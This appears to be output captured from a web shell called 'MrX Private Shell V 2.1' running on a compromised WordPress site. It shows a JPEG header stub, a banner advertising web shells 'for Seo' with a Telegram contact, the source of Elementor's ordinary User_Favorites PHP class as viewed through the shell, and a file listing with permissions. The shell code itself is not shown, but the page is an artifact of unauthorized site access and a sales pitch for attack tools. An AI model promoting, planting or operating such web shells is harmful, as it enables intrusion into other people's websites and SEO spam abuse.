����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Elementor\Modules\Library;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
class User_Favorites {
const USER_META_KEY = 'elementor_library_favorites';
/**
* @var int
*/
private $user_id;
/**
* @var array|null
*/
private $cache;
/**
* User_Favorites constructor.
*
* @param $user_id
*/
public function __construct( $user_id ) {
$this->user_id = $user_id;
}
/**
* @param null $vendor
* @param null $resource
* @param false $ignore_cache
*
* @return array
*/
public function get( $vendor = null, $resource = null, $ignore_cache = false ) {
if ( $ignore_cache || empty( $this->cache ) ) {
$this->cache = get_user_meta( $this->user_id, self::USER_META_KEY, true );
}
if ( ! $this->cache || ! is_array( $this->cache ) ) {
return [];
}
if ( $vendor && $resource ) {
$key = $this->get_key( $vendor, $resource );
return isset( $this->cache[ $key ] ) ? $this->cache[ $key ] : [];
}
return $this->cache;
}
/**
* @param $vendor
* @param $resource
* @param $id
*
* @return bool
*/
public function exists( $vendor, $resource, $id ) {
return in_array( $id, $this->get( $vendor, $resource ), true );
}
/**
* @param $vendor
* @param $resource
* @param array $value
*
* @return $this
* @throws \Exception If fails to save.
*/
public function save( $vendor, $resource, $value = [] ) {
$all_favorites = $this->get();
$all_favorites[ $this->get_key( $vendor, $resource ) ] = $value;
$result = update_user_meta( $this->user_id, self::USER_META_KEY, $all_favorites );
if ( false === $result ) {
throw new \Exception( 'Failed to save user favorites.' );
}
$this->cache = $all_favorites;
return $this;
}
/**
* @param $vendor
* @param $resource
* @param $id
*
* @return $this
* @throws \Exception If fails to add.
*/
public function add( $vendor, $resource, $id ) {
$favorites = $this->get( $vendor, $resource );
if ( in_array( $id, $favorites, true ) ) {
return $this;
}
$favorites[] = $id;
$this->save( $vendor, $resource, $favorites );
return $this;
}
/**
* @param $vendor
* @param $resource
* @param $id
*
* @return $this
* @throws \Exception If fails to save.
*/
public function remove( $vendor, $resource, $id ) {
$favorites = $this->get( $vendor, $resource );
if ( ! in_array( $id, $favorites, true ) ) {
return $this;
}
$favorites = array_filter( $favorites, function ( $item ) use ( $id ) {
return $item !== $id;
} );
$this->save( $vendor, $resource, $favorites );
return $this;
}
/**
* @param $vendor
* @param $resource
*
* @return string
*/
private function get_key( $vendor, $resource ) {
return "{$vendor}/{$resource}";
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| documents | Folder | 0755 |
|
|
| traits | Folder | 0755 |
|
|
| module.php | File | 1.46 KB | 0644 |
|
| user-favorites.php | File | 2.73 KB | 0644 |
|